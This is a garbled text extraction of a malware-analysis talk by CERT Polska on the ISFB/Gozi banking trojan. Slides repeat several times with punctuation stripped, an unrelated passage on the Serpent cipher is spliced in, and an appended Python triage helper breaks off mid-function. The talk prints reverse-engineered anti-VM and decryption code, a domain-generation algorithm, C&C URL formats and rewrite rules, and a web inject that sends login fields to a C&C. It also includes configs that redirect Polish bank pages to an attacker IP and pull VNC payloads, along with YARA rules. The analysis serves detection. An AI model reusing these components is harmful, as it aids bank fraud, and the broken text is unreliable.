Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits.[2] The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.

C&C response

Command and Control

IAP

```nginx
rewrite ^/fileto/(.*)\.(bin)  /get128.php?x=$1   break;
rewrite ^/images/(.*)\.(bmp)  /data.php?x=$1$2   break;
rewrite ^/images/(.*)\.(avi)  /loader.php?x=$1$2 break;
rewrite ^/images/(.*)\.(gif)  /task.php?x=$1$2   break;
rewrite ^/images/(.*)\.(jpeg) /config.php?x=$1$2 break;
```

IAP

Dreambot

```apache
RewriteEngine on
RewriteRule ^c(.+)\.php$ new_chandler.php [L,QSA]
RewriteRule ^t(.+)\.php$ new_thandler.php [L,QSA]
RewriteRule ^d(.+)\.php$ new_dhandler.php [L,QSA]
RewriteRule ^images/(.*)\.(bmp)  new_dhandler.php?q=$1$2 [L,QSA]
RewriteRule ^images/(.*)\.(gif)  new_thandler.php?q=$1$2 [L,QSA]
RewriteRule ^images/(.*)\.(jpeg) new_chandler.php?q=$1$2 [L,QSA]
```

Dreambot

```yara
rule isfb_dreambot : banker
{
    meta:
        author = "mak"
        module = "isfb"
    strings:
        $str0 = "vmware" fullword
        $str1 = "vbox" fullword
        $str2 = "virtual hd" fullword
        $str4 = "qemu" fullword
        $str3 = "c321.txt" fullword
    condition:
        all of them and isfb_dropper
}
```

The End, or not

Offsprings and Cousins

Payloads

· Nymaim
· Powersniff / PunchyBagg

Common Roots

· Bolek/KBOT - based on gozi
· Rovnix - ISFB was ring3 payload protected by rovnix
· Vawtrak - nothing in common

Recap

· One of the oldest bankers under active development
· Interesting solutions
· Various methods of infection
· Elaborate communication methods: DGA, P2P, TOR
· Old bugs die hard
· Read paper for more details
· Code soon available at github: mak/random-stuff/isfb

Kudos: people that knowingly (or not) helped us

· Slavo
· Paul Black
· Kafeine
· Peter Kruse
· Piotr Kijewski
· Jarosław Jedynak
· Horgh
· Frank Ruiz

Q & A

info@cert.pl  www.cert.pl

CERTPolska  CERTPolska

CERTPolska  CERTPolska_en

mak  mak@cert.pl

Page 4: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 458

Disclaimer

Based on proposed plan author did some source codeanalysis and want to summarize his

Well Nope 75 of this came from Reverse Engineering

458

ISFB long story short

02122016 ISFB

httpslokalhostpltalksbotconf20161 558

ISFB long story short

Based on gozisame bugs going back to 2007UrsnifGoziGozi2RovnixVawtrakCasual history with rovnixFor us public appearence in 2014Now one of most puplar bankers on marketCouple of offsprings

middotmiddotmiddotmiddotmiddotmiddotmiddot

558

02122016 ISFB

httpslokalhostpltalksbotconf20161 658

ISFB

UrsnifGoziGozi2RovnixVawtrak

DbgPrint(ISFB_04x Installer DLL finished with status un GetCurrentProcessId() Status)C

ISFB project Version 213241 module dllc $Revision 265 $

658

02122016 ISFB

httpslokalhostpltalksbotconf20161 758

Scale

(n6 sinkhole connections in october - bankers only)

758

02122016 ISFB

httpslokalhostpltalksbotconf20161 858

Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]

858

02122016 ISFB

httpslokalhostpltalksbotconf20161 958

Scale

958

Scale

02122016 ISFB

httpslokalhostpltalksbotconf20161 1058

Scalekudos to Slavo (SWITCH-CERT)

1058

02122016 ISFB

httpslokalhostpltalksbotconf20161 1158

The Dropperor where the acients reside

02122016 ISFB

httpslokalhostpltalksbotconf20161 1258

Welcome to the system

achieve persistencyinject workersetup IPCnew download 2nd stage

middotmiddotmiddotmiddot

1258

02122016 ISFB

httpslokalhostpltalksbotconf20161 1358

Useless strings

1358

02122016 ISFB

httpslokalhostpltalksbotconf20161 1458

One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)

1458

02122016 ISFB

httpslokalhostpltalksbotconf20161 1558

Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)

C

1558

Anti-VM

02122016 ISFB

httpslokalhostpltalksbotconf20161 1658

Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)

C

1658

02122016 ISFB

httpslokalhostpltalksbotconf20161 1758

String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12

C

1758

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 5: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 558

ISFB long story short

Based on gozisame bugs going back to 2007UrsnifGoziGozi2RovnixVawtrakCasual history with rovnixFor us public appearence in 2014Now one of most puplar bankers on marketCouple of offsprings

middotmiddotmiddotmiddotmiddotmiddotmiddot

558

02122016 ISFB

httpslokalhostpltalksbotconf20161 658

ISFB

UrsnifGoziGozi2RovnixVawtrak

DbgPrint(ISFB_04x Installer DLL finished with status un GetCurrentProcessId() Status)C

ISFB project Version 213241 module dllc $Revision 265 $

658

02122016 ISFB

httpslokalhostpltalksbotconf20161 758

Scale

(n6 sinkhole connections in october - bankers only)

758

02122016 ISFB

httpslokalhostpltalksbotconf20161 858

Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]

858

02122016 ISFB

httpslokalhostpltalksbotconf20161 958

Scale

958

Scale

02122016 ISFB

httpslokalhostpltalksbotconf20161 1058

Scalekudos to Slavo (SWITCH-CERT)

1058

02122016 ISFB

httpslokalhostpltalksbotconf20161 1158

The Dropperor where the acients reside

02122016 ISFB

httpslokalhostpltalksbotconf20161 1258

Welcome to the system

achieve persistencyinject workersetup IPCnew download 2nd stage

middotmiddotmiddotmiddot

1258

02122016 ISFB

httpslokalhostpltalksbotconf20161 1358

Useless strings

1358

02122016 ISFB

httpslokalhostpltalksbotconf20161 1458

One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)

1458

02122016 ISFB

httpslokalhostpltalksbotconf20161 1558

Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)

C

1558

Anti-VM

02122016 ISFB

httpslokalhostpltalksbotconf20161 1658

Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)

C

1658

02122016 ISFB

httpslokalhostpltalksbotconf20161 1758

String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12

C

1758

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

Web Actions

    ACTION REDIRECT - Target myjs128js -> http51016736dimyjs128_plv3js
    ACTION REDIRECT - Target myjs28js -> http51016736dimyjs28_plv3js
    ACTION REDIRECT - Target ats8gatephp -> http51016736azatsbmidgate128php
    ACTION REDIRECT - Target httpswwwcentrum24pl -> http51016736fkcen1php
    ACTION REDIRECT - Target httpscompanynetmbankpl -> http51016736fkmbiz1php
    ACTION FILE - Target prv
    ACTION VNC - Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpscompanynetmbankpl | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpsiri | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpskiri | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpsibiznes2 | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpsplhomebankin | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpshbfaces | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin

The Bot

Registry Keys

    Software\AppDataLow\Software\Microsoft\{[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}}

· Install
· Client
· NetCfg
· LastTask
· LastConfig

Other Actions

· GET_CERTS
· GET_COOKIES
· GET_SYSINFO
· LOAD_EXE
· GET_FILES
· SOCKS_START
· GET_KEYLOG
· GET_MAIL
· GET_FTP
· VNC_START
· URL_BLOCK


Calling Home

ET phone home

· Static domains inside configuration files
· DGA based on template and current data
· C&C hidden in TOR network
· P2P network

DGA

    rnd = LsaRandom()
    rnd.seed = (((kwargs['seed'] << 16) & 0xffffffff) + kwargs['season'] + kwargs['lsa_seed']) & 0xffffffff
    rnd.seed = (1 << 16) + kwargs['season'] - 0x124676D0
    r = []
    for i in range(kwargs['count']):
        suf = kwargs['tld'][(rnd.rnd() >> 1) % len(kwargs['tld'])]  # rnd.choose(kwargs['tld'])
        dom_l = rnd.rnd() % self.DGA_MIN_LEN + self.DGA_MIN_LEN
        wc = 0
        dom = []
        while wc < dom_l:
            d = rnd.choose(words)
            ws = len(d)
            if not rnd.rnd() % 3:
                ws /= 2
            if wc + ws > self.DGA_MAX_LEN:
                continue
            dom.append(d[:ws])
            wc += ws
        r.append(''.join(dom) + suf)

TOR (screenshot slide)

P2P

    typedef struct {
        DWORD magic;        /* 0x395f2ec1 */
        DWORD my_secret;
        DWORD his_secret;
        BYTE  cmd0;
        BYTE  cmd1;
        BYTE  data[];
    } isfb_p2p_inner_packet;

    typedef struct {
        BYTE  flags;
        DWORD salt;                 /* 4 random higher bytes of keys */
        isfb_p2p_inner_packet p;    /* encrypted */
    } isfb_p2p_packet;

Internet is Hard

URL format

    https://%s/%s?user%5fid=%4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x

    tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY

    oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f

    cnctld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg

    t[RAND].php?[RAND]=data

URL format

    decode_req = lambda d: decrypt(d.decode('base64'), SKEY)
    d = re.sub('_([0-9A-Fa-f]{2})', lambda x: chr(int(x.group(1), 16)), d)
    try:
        e = d.decode('base64')
    except Exception as e:
        d = d + '=='
    pprint.pprint(dict(map(lambda x: x.split('='), decode_req(d).strip('\x00').split('&'))))

    {'crc': '7001380',
     'id': '1065',
     'ppc': 'xi',
     'server': '12',
     'soft': '1',
     'user': '0c0d784a0cf755970edbdf4c0cb27fca',
     'version': '214887'}

URL format

    path           | purpose                | status
    ---------------+------------------------+---------------------
    t*.php         | get new task           | used until Sep 2015
    c*.php         | get new config         | used until Sep 2015
    d*.php         | send stolen data       | used until Sep 2015
    images/*.gif   | get new task           | current format
    images/*.jpeg  | get new config         | current format
    images/*.bmp   | send stolen data       | current format
    images/*.avi   | download 2nd stage dll | not every C&C
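The path conventions in the table and the `_XX` / padding handling from the decode_req snippet, combined into a proxy-log triage helper; this is an added example written for this page, not the talk's tooling. The log lines and the blobs in them are constructed, no decryption is attempted (decrypt and SKEY from the snippet need the sample's key), and the 16-byte minimum blob length is a threshold chosen for this example.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# (path regex, purpose, era) taken from the URL format table on the page
PATTERNS = [
    (re.compile(r"/t[^/?]*\.php$"),    "get new task",           "legacy"),
    (re.compile(r"/c[^/?]*\.php$"),    "get new config",         "legacy"),
    (re.compile(r"/d[^/?]*\.php$"),    "send stolen data",       "legacy"),
    (re.compile(r"/images/.+\.gif$"),  "get new task",           "current"),
    (re.compile(r"/images/.+\.jpeg$"), "get new config",         "current"),
    (re.compile(r"/images/.+\.bmp$"),  "send stolen data",       "current"),
    (re.compile(r"/images/.+\.avi$"),  "download 2nd stage dll", "current"),
]

MIN_BLOB = 16  # example threshold: a real encrypted request is far longer than this


def unescape_blob(s: str) -> Optional[bytes]:
    """Undo the URL-safe encoding seen in decode_req: `_XX` -> chr(0xXX), then
    base64-decode, re-adding the padding the bot strips. None if not base64."""
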